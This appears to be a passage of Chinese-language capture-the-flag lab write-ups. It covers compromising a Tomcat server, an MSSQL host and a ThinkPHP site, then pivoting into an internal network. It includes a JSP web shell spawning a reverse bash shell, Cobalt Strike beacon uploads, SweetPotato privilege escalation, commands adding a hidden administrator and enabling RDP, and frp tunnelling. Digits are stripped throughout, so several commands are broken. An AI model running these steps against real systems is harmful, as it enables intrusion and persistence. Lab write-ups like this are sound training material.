flag 端口，猜测tomcat,扫一下目录 发现docs目录，进去看发现该tomcat版本存在文件读取，于是尝试攻击 发现有一个UploadServlet 然后使用文件包含反弹shell .jsp <% java.io.InputStream in = Runtime.getRuntime().exec("bash -c &#;echo,base&#;|&#;base,-d&#;|&#;bash,-i&#;").getInputStream(); int a = -; byte[] b = new byte[]; out.print("<pre>"); while((a=in.read(b))!=-)&#; out.println(new String(b)); &#; out.print("</pre>");%> 然后我们 ...

flag 在使用fscan扫描的时候发现存在sqlserver（mssql）弱口令，使用MDUT连接，然后在公网vps起teamserver，往mssql中传cs木马直接上线 最后发现需要提权，因为是mssql系列，考虑Potato提权 使用SweetPotato执行beacon.exe实现system权限木马上线 然后在admin中找到flag 这里是我创建了一个新用户，登录进去之后访问的flag net user fault qwer! /addnet localgroup administrators fault /addREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d /f flag 然后我们继续探测内网，传一个fscan上去扫描内网，发现dc机器 到这里，我们搜集用户信息 shell net user 找到还有一个john用户，然后我们尝试看看 ...

flag 访问靶机后有如下 信息搜集 title图标一眼顶针tp，fscan扫出来是tp. rce漏洞 写🐎然后蚁剑 蚁剑 无密码执行mysql 发现无密码执行mysql，利用这个执行命令 查找flag sudo mysql -e ;\! find / -name flag*; 然后直接cat flag sudo mysql -e ;\! cat /root/flag/flag.txt; 拿到第一段flag flag: flag&#;b- 继续信息搜集 flag 发现内网网段，直接fscan fscan之后发现信呼OA，尝试进行内网穿透 frp搭建 frpc.ini [common]server_addr = [服务器ip]server_port = [socks_to_] type = tcpremote_port = plugin = socks 在客户机启动 ./frpc -c frpc.ini frps.ini [com ...